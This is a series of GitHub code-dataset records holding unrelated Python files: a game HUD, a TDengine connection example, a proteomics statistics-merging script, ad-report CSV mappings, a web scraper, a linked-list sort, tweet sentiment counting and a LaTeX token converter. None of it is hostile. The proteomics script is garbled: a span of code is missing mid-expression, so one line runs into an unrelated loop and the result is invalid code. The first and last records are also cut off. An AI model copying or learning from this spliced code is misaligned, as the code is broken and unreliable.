0\r\n\t\tself.backgrounds = 0\r\n\t\tself.bullets = 0\r\n\t\tself.lasers = 0\r\n\t\tself.ship = 0\r\n\t\tself.enemy = 0\r\n\t\tself.hub = 0\r\n\t\t\r\n\tdef update(self, ai):\r\n\t\t# Limits\r\n\t\tif self.h_bar <= 0:\r\n\t\t\tself.h_bar = 0\r\n\t\telif self.h_bar >= 100:\r\n\t\t\tself.h_bar = 100\r\n\t\t\t\r\n\t\tif self.s_bar <= 0:\r\n\t\t\tself.s_bar = 0\r\n\t\telif self.s_bar >= 100:\r\n\t\t\tself.s_bar = 100\r\n\t\t\r\n\t\t# black borders\r\n\t\tpygame.draw.rect(self.screen, (0, 0, 0), (0, 0, ai.width, (116)))\r\n\t\tpygame.draw.rect(self.screen, (0, 0, 0), (0, ((ai.height-116)), ai.width, (116)))\t\r\n\t\t# Card\r\n\t\tself.screen.blit(self.card, self.c_rect)\t\r\n\t\t# health bar\r\n\t\tpygame.draw.rect(self.screen, self.h_shade_1, ((self.c_rect.left + 90), (self.h_y), (self.h_bar), 2))\r\n\t\tpygame.draw.rect(self.screen, self.h_shade_2, ((self.c_rect.left + 90), (self.h_y + 2), (self.h_bar), 1))\r\n\t\tpygame.draw.rect(self.screen, self.h_shade_3, ((self.c_rect.left + 90), (self.h_y + 3), (self.h_bar), 1))\r\n\t\t# shield bar\r\n\t\tpygame.draw.rect(self.screen, self.s_shade_1, ((self.c_rect.left + 90), (self.s_y), (self.s_bar), 2))\r\n\t\tpygame.draw.rect(self.screen, self.s_shade_2, ((self.c_rect.left + 90), (self.s_y + 2), (self.s_bar), 1))\r\n\t\tpygame.draw.rect(self.screen, self.s_shade_3, ((self.c_rect.left + 90), (self.s_y + 3), (self.s_bar), 1))\r\n\t\t\r\n\t\t# Score\r\n\t\tself.s_str = str(self.score)\r\n\t\tself.s_img = self.s_font.render(self.s_str, True, 
self.s_color, (0, 0, 0))\r\n\t\tself.s_rect = self.s_img.get_rect()\r\n\t\tself.s_rect.right = 23 * ai.width / 24\r\n\t\tself.s_rect.centery = ai.height / 24\r\n\t\tself.screen.blit(self.s_img, self.s_rect)\r\n\t\t\r\n\tdef halt(self):\r\n\t\t\"\"\"Pauses all processes.\"\"\"\r\n\t\tself.inputs *= -1\r\n\t\tself.backgrounds *= -1\r\n\t\tself.bullets *= -1\r\n\t\tself.lasers *= -1\r\n\t\tself.ship *= -1\r\n\t\tself.enemy *= -1\r\n\t\t\r\n\tdef za_wurado(self, ai):\r\n\t\tself.bullets = 1\r\n\t\tself.lasers = 1\r\n\t\tself.enemy = 1\r\n\t\tai.static_speed = 0\r\n\t\tai.static_speed = 0\r\n\r\n","repo_name":"c3mead/fragments","sub_path":"hub.py","file_name":"hub.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39097922325","text":"import taosrest\nimport os\n\n\ndef connect_to_cloud_use_token(url, token):\n conn = taosrest.connect(url=url,\n token=token)\n\n print(conn.server_info)\n cursor = conn.cursor()\n cursor.execute(\"drop database if exists pytest\")\n cursor.execute(\"create database pytest precision 'ns' keep 365\")\n cursor.execute(\"create table pytest.temperature(ts timestamp, temp int)\")\n cursor.execute(\"insert into pytest.temperature values(now, 1) (now+10b, 2)\")\n cursor.execute(\"select * from pytest.temperature\")\n rows = cursor.fetchall()\n print(rows)\n\n\nif __name__ == '__main__':\n url = os.environ[\"TDENGINE_CLOUD_URL\"]\n token = os.environ[\"TDENGINE_CLOUD_TOKEN\"]\n connect_to_cloud_use_token(url, token)\n","repo_name":"taosdata/taos-connector-python","sub_path":"examples/connect_cloud_service.py","file_name":"connect_cloud_service.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"} +{"seq_id":"34762325459","text":"#python proteinGroupsTtestCombine.py L:\\promec\\TIMSTOF\\LARS\\2022\\februar\\Sigrid\\combined\\txtDQnoPHOS\\reports\\CTRL\nimport sys\n#!pip3 install pathlib --user\nfrom pathlib import Path\nif len(sys.argv)!=2: sys.exit(\"\\n\\nREQUIRED: pandas, pathlib; tested with Python 3.9 \\n\\nUSAGE: python proteinGroupsTtestCombine.py \\n\\nExample\\n\\npython proteinGroupsTtestCombine.py L:\\promec\\TIMSTOF\\LARS\\2022\\februar\\Sigrid\\combined\\txt\\reports\\CTRL\")\npathFiles = Path(sys.argv[1])\n#pathFiles=Path(\"L:/promec/TIMSTOF/LARS/2022/\")\nfileName='*tTestBH.csv'\ntrainList=list(pathFiles.rglob(fileName))\ntrainList=[fN for fN in trainList if \"eate\" in str(fN)]\n#trainList=list([Path('L:/promec/TIMSTOF/LARS/2022/februar/Sigrid/combined/txt/reports/CTRL/proteinGroups.txtLFQ.intensity.16MUT CtrlWT Ctrl0.050.50.05BiotTestBH.csv'),Path('L:/promec/TIMSTOF/LARS/2021/Desember/211207_Nilu/combined/txt/proteinGroups.txt'),Path('L:/promec/TIMSTOF/LARS/2022/februar/Sigrid/combined/txt/reports/CTRL/proteinGroups.txtLFQ.intensity.16MUTctrlWTctrl0.050.50.05grouptTestBH.csv')])\n#!pip3 install pandas --user\nimport pandas as pd\n#df = pd.concat(map(pd.read_table, trainList))\n#df.to_csv(pathFiles.with_suffix('.combinedT.txt'),sep=\"\\t\")#,rownames=FALSE)\n#f=trainList[1]\ndfC=pd.DataFrame()\ndfB=pd.DataFrame()\ni=0\nfdrThrHigh=0.1\nfdrThrLow=10e5\nlog2Thr=0.5\nfor f in trainList:\n i=i+1\n if Path(f).stat().st_size > 0:\n print(f\"{i!r},{f.parts!r}\")\n proteinHits=pd.read_csv(f)\n proteinHits.rename({'RowGeneUniProtScorePeps':'ID'},inplace=True,axis='columns')\n proteinHits=proteinHits[~proteinHits['ID'].str.contains(\"HUMAN\",na=False)]\n 
#proteinHits=proteinHits[proteinHits.CorrectedPValueBH<fdrThrHigh]\n #proteinHits=proteinHits[(proteinHits.Log2MedianChange>log2Thr)| (proteinHits.Log2MedianChange<-1*log2Thr)]\n proteinHitsC=proteinHits.ID.str.split(';;', expand=True).set_index(proteinHits.Log2MedianChange).stack().reset_index(level=0, name='ID')\n proteinHitsC=proteinHitsC[proteinHitsC.index==1]\n #proteinHitsC=proteinHitsC.ID.str.split(';', expand=True).set_index(proteinHits.Log2MedianChange).stack().reset_index(level=0, name='ID')\n proteinHitsC=proteinHitsC[proteinHitsC['ID']!=\"\"]\n proteinHitsB=proteinHits.ID.str.split(';;', expand=True).set_index(proteinHits.CorrectedPValueBH).stack().reset_index(level=0, name='ID')\n proteinHitsB=proteinHitsB[proteinHitsB.index==1]\n #proteinHitsB=proteinHitsB.ID.str.split(';', expand=True).set_index(proteinHits.CorrectedPValueBH).stack().reset_index(level=0, name='ID')\n proteinHitsB=proteinHitsB[proteinHitsB['ID']!=\"\"]\n proteinHitsC['Name']=f.parts[7]+f.parts[6]+f.parts[-1]+str(i)\n proteinHitsB['Name']=f.parts[7]+f.parts[6]+f.parts[-1]+str(i)\n dfC=pd.concat([dfC,proteinHitsC],sort=False)\n dfB=pd.concat([dfB,proteinHitsB],sort=False)\nprint(dfC.columns)\nprint(dfB.columns)\ndfC=dfC.pivot(index='ID', columns='Name', values='Log2MedianChange')\ndfC.to_csv(pathFiles.with_suffix('.Log2MedianChange.combined.csv'))\ndfB=dfB.pivot(index='ID', columns='Name', values='CorrectedPValueBH')\ndfB.to_csv(pathFiles.with_suffix('.CorrectedPValueBH.combined.csv'))\ndf=pd.merge(dfC, dfB, on='ID')\ndf.to_csv(pathFiles.with_suffix('.Log2MedianChange.CorrectedPValueBH.combined.csv'))\nimport seaborn as sns\nsns.jointplot(y=dfC.iloc[:,1],x=dfC.iloc[:,0]).figure.savefig(pathFiles.with_suffix(\".log2Scatter.svg\"),dpi=100,bbox_inches = \"tight\")#,kind=\"reg\")\ndfC=dfC.fillna(0)\ndfCB=dfC[(dfC.iloc[:,1]>log2Thr)&(dfC.iloc[:,0]>log2Thr)]\ndfCB.to_csv(pathFiles.with_suffix('.BOTH.Log2MedianChange.combined.csv'))\ndfC1=dfC[(dfC.iloc[:,1]<log2Thr)&(dfC.iloc[:,0]>log2Thr)]\ndfC1.to_csv(pathFiles.with_suffix('.first.Log2MedianChange.combined.csv'))\ndfC2=dfC[(dfC.iloc[:,1]>log2Thr)&(dfC.iloc[:,0] 0:\n print(i,f.parts[-3],f.parts[-4],f.parts[-5])\n proteinHits=pd.read_csv(f,low_memory=False,sep='\\t')\n proteinHitsLFQ=proteinHits.assign(ID=proteinHits['Protein IDs'].str.split(';')).explode('ID')\n proteinHitsLFQ.index=proteinHitsLFQ['ID']\n proteinHitsLFQ=proteinHitsLFQ.add_suffix(f.parts[-3]+f.parts[-4]+f.parts[-5]+'F'+str(i))\n dfLFQ=pd.concat([dfLFQ,proteinHitsLFQ],axis=1)\nprint(dfLFQ.columns)\n#dfLFQ['211207_NiluDesember2'].hist()\n#(dfLFQ['211221_NiluDesember3']-dfLFQ['Score211221_NiluDesemberF3']).hist()\ndfLFQ.to_csv(pathFiles/(fileName+\"Combo.csv\"))\ndfS=dfLFQ.filter(like='Peptide sequence', axis=1)\n#dfS=dfLFQ[:,[dfLFQ.filter(like='Peptide sequence', axis=1)]].apply(lambda x: ''.join(x), axis=1)\ndfLFQPeptides=dfS[dfS.columns].apply(lambda x:','.join(x.dropna().astype(str)),axis=1)\n#dfLFQPeptides['C9J1R6']#EFPDLGAHCSEPSCQR\n#dfLFQPeptides.filter(like='HTSALCNSCR')#EFPDLGAHCSEPSCQR,HPLDHDCSGEGHPTSR;HRHPLDHDCSGEGHPTSR,HPLDHDCSGEGHPTSR;HRHPLDHDCSGEGHPTSR\ndfLFQPeptides.to_csv(pathFiles/(fileName+\"dfLFQPeptides.csv\"))\ndfLFQvals=dfLFQ.filter(like='LFQ', axis=1)\n#dfLFQvals=dfLFQ.filter(like='Intensity', axis=1)\ndfLFQvals.to_csv(pathFiles/(fileName+\"dfLFQvals.csv\"))\ndfLFQvalsSeqs=pd.concat([dfLFQvals,dfLFQPeptides],axis=1)\ndfLFQvalsSeqs.to_csv(pathFiles/(fileName+\"dfLFQvalsSeqs.csv\"))\ndfLFQvalsSeqsMedian=dfLFQvalsSeqs.groupby(0).median()\ndfLFQid=dfLFQPeptides.reset_index()\ndfLFQidC=dfLFQid.groupby(0).agg({'ID': 
';'.join})\ndfLFQvalsSeqsUni=pd.concat([dfLFQidC,dfLFQvalsSeqsMedian],axis=1)\ndfLFQvalsSeqsUni.to_csv(pathFiles/(fileName+\"dfLFQvalsSeqsUni.csv\"))\nlog2dfLFQvalsSeqsUni=dfLFQvalsSeqsUni.fillna(0)\nlog2dfLFQvalsSeqsUni.index=log2dfLFQvalsSeqsUni['ID']\nlog2dfLFQvalsSeqsUni=log2dfLFQvalsSeqsUni.drop(['ID'], axis=1)\nlog2dfLFQvalsSeqsUni=np.log2(log2dfLFQvalsSeqsUni+1)\n#log2dfLFQvalsSeqsUni.hist()#.figure.savefig(pathFiles/(fileName+\"log2dfLFQvalsSeqsUni.hist.svg\"),dpi=100,bbox_inches = \"tight\")\nlog2dfLFQvalsSeqsUni.to_csv(pathFiles/(fileName+\"log2dfLFQvalsSeqsUni.csv\"))\nlog2dfLFQvalsSeqsUni.plot(kind='hist',alpha=0.5,bins=100).figure.savefig(pathFiles/(fileName+\"log2dfLFQvalsSeqsUni.svg\"),dpi=100,bbox_inches = \"tight\")","repo_name":"animesh/scripts","sub_path":"proteinGroupsTtestCombine.py","file_name":"proteinGroupsTtestCombine.py","file_ext":"py","file_size_in_byte":8530,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"24261800165","text":"# -*- encoding: utf-8 -*-\n\nCSV_FIELD_NAME_TRANSFORM = {\n # Adsense zh-TW\n \"日期\" : \"Date\",\n \"月份\" : \"Month\",\n \"星期\" : \"Week\",\n \"預估收益 (USD)\": \"Estimated earnings (USD)\",\n \"瀏覽量\": \"Page views\",\n \"網頁千次曝光收益 (USD)\": \"Page RPM (USD)\",\n \"曝光次數\": \"Impressions\",\n \"曝光千次曝光收益 (USD)\": \"Impression RPM (USD)\",\n \"Active View 可視率\": \"Active View Viewable\",\n \"點擊\": \"Clicks\",\n \"點閱率\": \"CTR\",\n \"單次點擊出價 (USD)\": \"CPC (USD)\",\n\n # Adsense zh-CN\n \"日期\" : \"Date\",\n \"月\" : \"Month\",\n \"周\" : \"Week\",\n \"估算收入 (USD)\" : \"Estimated earnings (USD)\",\n \"网页浏览量\" : \"Page views\",\n \"网页 RPM (USD)\" : \"Page RPM (USD)\",\n \"展示次数\" : \"Impressions\",\n \"每千次展示收入 (USD)\" : \"Impression RPM (USD)\",\n \"Active View 可见率\" : \"Active View Viewable\",\n \"点击次数\" : \"Clicks\",\n \"点击率\" : \"CTR\",\n\n # Admob zh-TW\n \"週次\" : \"Week\",\n \"月份\" : \"Month\",\n \"預估收益 (USD)\" : \"Estimated earnings (USD)\",\n \"曝光\" : \"Impressions\",\n \"觀察到的有效千次曝光出價 (USD)\": \"Impression RPM (USD)\",\n \"點擊次數\": \"Clicks\",\n \"點閱率 (%) (%)\" : \"CTR%\",\n\n # GA3 zh-TW\n \"日索引\": \"Date\",\n \"使用者\": \"User\",\n \"新使用者\": \"NewUser\",\n\n # Firebase zh-CN\n \"第 N 天\" : \"\",\n \"30 天\" : \"\",\n \"7 天\" : \"\",\n \"1 天\" : \"\",\n}\n\nCSV_FIREBASE_KEYWORD = {\n \"活跃用户随时间的变化趋势如何?\" : \"DAU\",\n \"开始日期\" : \"Begin\",\n \"结束日期\" : \"End\",\n}\n\nCSV_KEYWORD_USAGE = {\n \"活跃用户随时间的变化趋势如何?\" : \"\",\n \"开始日期\" : \"\",\n \"结束日期\" : \"\",\n}\n\nCSV_FIELD_VALUE_TRANSFORM = {\n \"CTR%\" : {\n \"handlerType\": \"function\",\n \"handler\": lambda x: str(float(x.replace('%',''))*0.01),\n \"newFieldName\": \"CTR\",\n },\n \"Clicks\": {\n \"handlerType\": \"calc\",\n \"handler\": lambda row: (row['Estimated earnings (USD)'] / row[\"Clicks\"]) if row[\"Clicks\"] != 0 else 0,\n \"newFieldName\": \"CPC (USD)\",\n },\n \"Impressions\": {\n \"handlerType\": \"calc\",\n \"handler\": lambda row: (row['Clicks'] / row[\"Impressions\"]) if row[\"Impressions\"] != 0 else 0,\n \"newFieldName\": \"CTR\",\n },\n}\n\nCSV_FIELD_NAME_DATA_TYPE = {\n #\"Date\": str,\n #\"Month\": str,\n #\"Week\": str,\n \"Estimated earnings (USD)\": 1.0,\n \"Page views\": 1,\n \"Page RPM (USD)\": 1.0,\n \"Impressions\": 1,\n \"Impression RPM (USD)\": 1.0,\n #\"Active View Viewable\": str,\n \"CTR\": 1.0,\n \"Clicks\": 1,\n \"CPC (USD)\": 1.0,\n}\n\nCSV_OUTPUT_ADSENSE_FIELDS = [\n 'Estimated earnings (USD)', 'Impressions', 'Impression RPM (USD)', 'Clicks', 'CTR', 'CPC (USD)',\n]\n\nCSV_OUTPUT_GA_FIELDS = [\n 'User', 
'NewUser', 'PageView',\n]\n\nCSV_INPUT_CHECK_MAIN_FIELD = [\n 'Date', 'Week', 'Month',\n]\n\nCSV_OUTPUT_REPORT_COMPARISON_INFO = [\n\t'Estimated earnings (USD)', 'Average earnings (USD)' , 'Average CPC',\n]\n\nCSV_OUTPUT_FIELD_NAME_DATA_TYPE = {\n #\"Date\": str,\n #\"Month\": str,\n #\"Week\": str,\n \"Estimated earnings (USD)\": 1.0,\n \"Page views\": 1,\n \"Page RPM (USD)\": 1.0,\n \"Impressions\": 1,\n \"Impression RPM (USD)\": 1.0,\n #\"Active View Viewable\": str,\n \"CTR\": 1.0,\n \"Clicks\": 1,\n \"CPC (USD)\": 1.0,\n}\n\n","repo_name":"changyy/google-csv-helper","sub_path":"google_csv_helper/csv_common.py","file_name":"csv_common.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"39624500584","text":"'''\nOwned and authored by Ian Loeb.\n\nDescription: A webscraping script to pull \"hot search\" data from mytoken.io using BS4 and Selenium.\nThe script will save the data to a mytoken_data.xlsx spreadsheet.\n\nInstructions:\ninstall:\n\tbeautifulsoup4\n\tselenium\n\tpandas\n\tgeckodriver\n\topenpyxl\n\txlrd\n\nTo run:\n\tpython(python3) scrape.py\n\nTo change intervcal between requests:\n\tread line 79 comment\n\nTo change time length script will run:\n\tread line 67 comment\n\n'''\n\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nfrom bs4 import BeautifulSoup\nimport os\nimport time\nimport pandas as pd\nimport datetime\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\n\ndef scrape(url, df):\n\tdriver.get(url)\n\tsoup = BeautifulSoup(driver.page_source, 'lxml')\n\tdivs = soup.findAll('tr', attrs={'class':'ant-table-row ant-table-row-level-0'})\n\ttime_now = datetime.datetime.now()\n\tcount = 1\n\tfor div in divs:\n\t\tname_div = div.find('div', attrs={'class': 'name'})\n\t\tfire_div = div.findAll('div', attrs={'class': 'fire-item'})\n\t\tname = name_div.find(text=True)\n\t\tfire=0\n\t\tfor i in fire_div:\n\t\t\timg = i.find('img')\n\t\t\tif img['alt'] == '0':\n\t\t\t\tfire += 0.5\n\t\t\telif img['alt'] == '1':\n\t\t\t\tfire += 1\n\t\tdf.at[time_now, name+'_rank'] = count\n\t\tdf.at[time_now, name+'_heat'] = fire\n\t\tcount += 1\n\nurl = 'http://www.mytoken.io'\n\noptions = Options()\noptions.add_argument('--headless')\ndriver = webdriver.Firefox(options=options)\n\ndf = pd.read_excel('mytoken_data.xlsx', index_col=0)\n\ncount = 0\nwhile count<6: #number of x*interval seconds script will run\n\tscrape(url, df)\n\ttime.sleep(5) #interval in seconds\n\tcount += 1\ndf.to_excel('mytoken_data.xlsx')","repo_name":"iloeb99/mytokenio_scrape","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33997254483","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @return a ListNode\n def sortList(self, head):\n pointer=head\n len=0\n while pointer: #calculate the length\n len=len+1\n pointer=pointer.next\n head=self.mergesort(head,len)\n pointer=head\n while len>1:\n pointer=pointer.next\n len=len-1\n if pointer:\n pointer.next=None\n return head\n\n def mergesort(self,node,len):\n if len<= 1:\n return node\n mid=len//2\n pointer=node\n fh=node #fisrt head\n fl=mid #first len\n t=mid\n while t>0:\n t=t-1\n pointer=pointer.next\n #fisrt: mid (head to mid) 
second: len-mid (mid+1 to tail)\n sh=pointer #second head\n sl=len-mid #second len\n fh=self.mergesort(fh,fl)\n sh=self.mergesort(sh,sl)\n newlist=ListNode(0) #\n pointer=newlist\n while fl>0 and sl>0: #do not use `fh and sh`, fh.next is not None!\n if fh.val < sh.val:\n pointer.next=fh\n pointer=pointer.next\n fh=fh.next\n fl=fl-1\n else:\n pointer.next=sh\n pointer=pointer.next\n sh=sh.next\n sl=sl-1\n while fl>0:\n pointer.next=fh\n pointer=pointer.next\n fh=fh.next\n fl=fl-1\n while sl>0:\n pointer.next=sh\n pointer=pointer.next\n sh=sh.next\n sl=sl-1\n if newlist.next:\n return newlist.next\n else:\n return None\n\nif __name__=='__main__':\n head=ListNode(4)\n head.next=ListNode(3)\n head.next.next=ListNode(5)\n head.next.next.next=ListNode(2)\n head=Solution().sortList(head)\n while head:\n print(head.val)\n head=head.next\n pass\n","repo_name":"javayhu/XSolutions","sub_path":"python/SortList.py","file_name":"SortList.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74441026754","text":"import os\nimport argparse\nimport json\nimport pandas as pd\nimport src.clean_data as clean\n\ndef add_to_sentiment_count(entry, counts, sentiment):\n if entry in counts[sentiment]:\n counts[sentiment][entry] += 1\n else:\n counts[sentiment][entry] = 1\n\ndef remove_rares(total_count, other_dict, min_count):\n for entry in total_count:\n if total_count[entry] < min_count:\n for key in other_dict:\n for sentiment in other_dict[key]: # remove rare words from every sentiment dictionary\n other_dict[key][sentiment].pop(entry, None)\n\ndef main(tweet_file):\n # make an easily accessible dictionary of stopwords\n script_path = os.path.abspath(os.path.dirname(__file__))\n stop_path = os.path.join(script_path, '..', 'data', 'stopwords.txt')\n stopwords = clean.get_stopwords(stop_path)\n\n # initialization\n total_count = {}\n\n # stores the number of times a given word is used by a tweet in each category\n label_count = {\n 'covid/pandemic': {'positive': {}, 'negative': {}, 'neutral': {}},\n 'economy': {'positive': {}, 'negative': {}, 'neutral': {}},\n 'government': {'positive': {}, 'negative': {}, 'neutral': {}},\n 'movement': {'positive': {}, 'negative': {}, 'neutral': {}},\n 'precaution': {'positive': {}, 'negative': {}, 'neutral': {}},\n 'vaccine': {'positive': {}, 'negative': {}, 'neutral': {}},\n 'variant': {'positive': {}, 'negative': {}, 'neutral': {}}\n }\n\n tweets = pd.read_csv(tweet_file, encoding='iso-8859-1')\n for index in range(0, len(tweets)):\n label = tweets.loc[index, 'Label'].casefold()\n if label in label_count:\n words = tweets.loc[index, 'text']\n for word in clean.process_tweet(words, stopwords):\n sentiment = tweets.loc[index, 'Sentiment']\n add_to_sentiment_count(word, label_count[label], sentiment)\n clean.add_to_count(word, total_count)\n\n # removes words that aren't used at least 5 (can change if necessary) times in total\n remove_rares(total_count, label_count, 5)\n return label_count\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('tweet_file', help='Enter the name of the file that contained all the tweets.')\n # parser.add_argument('output_file')\n args = parser.parse_args()\n\n tweet_file = args.tweet_file\n\n # if you need to specify different output directories, uncomment this\n #output = os.path.abspath(args.output)\n #output_dir = os.path.dirname(output)\n #if not os.path.isdir(output_dir):\n # os.makedirs(output_dir)\n\n 
label_count = main(tweet_file)\n\n script_path = os.path.abspath(os.path.dirname(__file__))\n with open(os.path.join(script_path, '..', 'data', 'catagorywise_label_words.json'), 'w') as f:\n json.dump(label_count, f, indent=4)\n","repo_name":"jgu13/Data_Science_COVID19_Emotion_Analysis_Project","sub_path":"src/catogotywise_clean_data.py","file_name":"catogotywise_clean_data.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30752256508","text":"import time\n\nclass Largestprimefactor:\n\n def __init__(self):\n self.start()\n\n def start(self):\n t1 = time.clock()\n self.calculate(600851475143)\n t2 = time.clock()\n print('Time: %0.6f' % (t2-t1))\n \n def calculate(self,n):\n y = 2\n while y * y <= n:\n if n % y == 0:\n n = n/y\n if(n != 1 and y* y >= n):\n print(int(n)) \n y+=1\n\n\na = Largestprimefactor()\n\n","repo_name":"Crysis-Gomez/PythonProjectEuler","sub_path":"problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9643958183","text":"import json\nimport os\n\n#### latex dictionary\nlatex_dict = {\n 'run': '\\\\textcode{def }\\DSLRun\\\\textcode{()}',\n 'if_only': 'if_only',\n 'ifelse': 'ifelse',\n 'if_else': 'if_else',\n 'if':'if',\n 'do': '\\DSLIf',\n 'else': '\\DSLElse',\n 'while': '\\DSLWhile',\n 'repeat': '\\DSLRepeat',\n 'repeat_until_goal': '\\DSLRepeatUntil',\n 'bool_path_ahead': '\\DSLBoolPathAhead',\n 'bool_no_path_ahead': '\\DSLBoolNoPathAhead',\n 'bool_path_left': '\\DSLBoolPathLeft',\n 'bool_no_path_left': '\\DSLBoolNoPathLeft',\n 'bool_path_right': '\\DSLBoolPathRight',\n 'bool_no_path_right': '\\DSLBoolNoPathRight',\n 'bool_marker': '\\DSLBoolMarker',\n 'bool_no_marker': '\\DSLBoolNoMarker',\n 'bool_goal': '\\DSLBoolGoal',\n 'X': '\\SDSLIter',\n '2': '2',\n '3': '3',\n '4': '4',\n '5': '5',\n '6': '6',\n '7': '7',\n '8': '8',\n '9': '9',\n 'A': '\\SDSLAction\\\\\\\\',\n 'bool_cond': '\\SDSLBoolCond',\n 'move': '\\DSLMove\\\\\\\\',\n 'turn_right': '\\DSLTurnRight\\\\\\\\',\n 'turn_left': '\\DSLTurnLeft\\\\\\\\',\n 'pick_marker': '\\DSLPickMarker\\\\\\\\',\n 'put_marker': '\\DSLPutMarker\\\\\\\\'\n}\nmcq_sol_dict = {\n 'move': '\\DSLMove',\n 'turnleft': '\\DSLTurnLeft',\n 'turnright': '\\DSLTurnRight',\n 'pickmarker': '\\DSLPickMarker',\n 'putmarker': '\\DSLPutMarker'\n}\n\n\nMACROS = \"macros_code.txt\"\n\ndef get_macros(macros_file = MACROS):\n script_dir = os.path.dirname(__file__) # <-- absolute dir the script is in\n rel_path = macros_file\n abs_file_path = os.path.join(script_dir, rel_path)\n with open(abs_file_path, 'r') as f:\n data = f.read()\n return data\n\n\ndef get_string_from_json(json_obj: dict):\n json_string = json.dumps(json_obj)\n #print(json_string)\n arr = json_string.split(' ')\n #print(arr)\n clean_arr = []\n for ele in arr:\n if '\"type\"' in ele:\n continue\n elif ele == '\"children\":':\n clean_arr.append('children[')\n elif '\"run\"' in ele:\n clean_arr.append('run')\n elif '\"move\"' in ele:\n clean_arr.append('move')\n elif '\"turn_left\"' in ele:\n clean_arr.append('turn_left')\n elif '\"turn_right\"' in ele:\n clean_arr.append('turn_right')\n elif '\"pick_marker\"' in ele:\n clean_arr.append('pick_marker')\n elif '\"put_marker\"' in ele:\n clean_arr.append('put_marker')\n elif '\"A\"' in ele:\n clean_arr.append('A')\n elif '\"do\"' in ele:\n clean_arr.append('do')\n elif '\"else\"' in ele and 
'\"ifelse\"' not in ele and '\"if_else\"' not in ele:\n clean_arr.append('else')\n else:\n if '}' in ele:\n mele = ele.split('}')\n clean_arr.append(mele[0][1:-1])\n else:\n clean_arr.append(ele[1:-2])\n if ']' in ele:\n c = ele.count(']')\n for i in range(c):\n clean_arr.append(']')\n\n return clean_arr\n\n\ndef check_token_arr(arr: list):\n '''checks the token arr for incomplete program constructs,\n and adds empty children if needed'''\n new_arr = []\n for i in range(len(arr)-1):\n ele = arr[i]\n nele = arr[i+1]\n new_arr.append(ele)\n if 'run' in ele:\n if 'children[' not in nele:\n new_arr.append('children[')\n new_arr.append(']')\n else:\n continue\n\n if 'repeat' in ele and 'repeat_until_goal' not in ele:\n if 'children[' not in nele:\n new_arr.append('children[')\n new_arr.append(']')\n else:\n continue\n\n if 'repeat_until_goal' in ele:\n if 'children[' not in nele:\n new_arr.append('children[')\n new_arr.append(']')\n else:\n continue\n\n if 'while' in ele:\n if 'children[' not in nele:\n new_arr.append('children[')\n new_arr.append(']')\n else:\n continue\n\n if 'do' in ele:\n if 'children[' not in nele:\n new_arr.append('children[')\n new_arr.append(']')\n else:\n continue\n\n if 'else' in ele:\n if 'children[' not in nele:\n new_arr.append('children[')\n new_arr.append(']')\n else:\n continue\n\n\n if 'run' in arr[-1] or 'repeat' in arr[-1] or 'while' in arr[-1] or \\\n 'repeat_until_goal' in arr[-1] or 'do' in arr[-1] or 'else' in arr[-1]:\n new_arr.append(arr[-1])\n new_arr.append('children[')\n new_arr.append(']')\n else:\n new_arr.append(arr[-1])\n\n return new_arr\n\n\n\n\n\n\ndef get_arr_with_tokens(arr: list, fill_in_blank=False):\n tokens_arr = []\n mcq_sol = ''\n for i, ele in enumerate(arr):\n if 'repeat' in ele or 'ifelse' in ele or 'while' in ele or \\\n 'repeat_until_goal' in ele or 'if_only' in ele or 'if_else' in ele or 'if' in ele:\n if 'deleted!' not in ele and 'added!' not in ele and 'replaced!' not in ele:\n s = ele.split('(')\n t = s[0]\n t_latex = latex_dict[t]\n cond = s[1].split(')')\n cond_latex = latex_dict[cond[0]]\n tokens_arr.append(t_latex+'\\\\textcode{('+cond_latex+')}')\n else:\n if 'deleted!' in ele:\n if 'deleted!' in ele:\n tokens_arr.append('\\\\framebox[1.0\\width]{\\\\textcolor{red}{*token-deleted*}}\\\\\\\\')\n else:\n split_ = ele.split('!')\n s = split_[1].split('(')\n t = s[0]\n t_latex = latex_dict[t]\n cond = s[1].split(')')\n cond_latex = latex_dict[cond[0]]\n tokens_arr.append('\\\\framebox[1.0\\width]{\\\\textcolor{red}{' + t_latex + '\\\\textcode{(' + cond_latex + ')}}}')\n\n elif ele == 'children[':\n tokens_arr.append(ele)\n elif ele == ']':\n tokens_arr.append(ele)\n elif 'do' in ele:\n if 'deleted!' not in ele and 'added!' not in ele and 'replaced!' not in ele:\n t_latex = latex_dict[ele]\n s_parent = arr[i-2]\n s = s_parent.split('(')\n cond = s[1].split(')')\n cond_latex = latex_dict[cond[0]]\n tokens_arr.append(t_latex + '\\\\textcode{(' + cond_latex + ')}')\n else:\n if 'deleted!' in ele:\n if 'deleted!' 
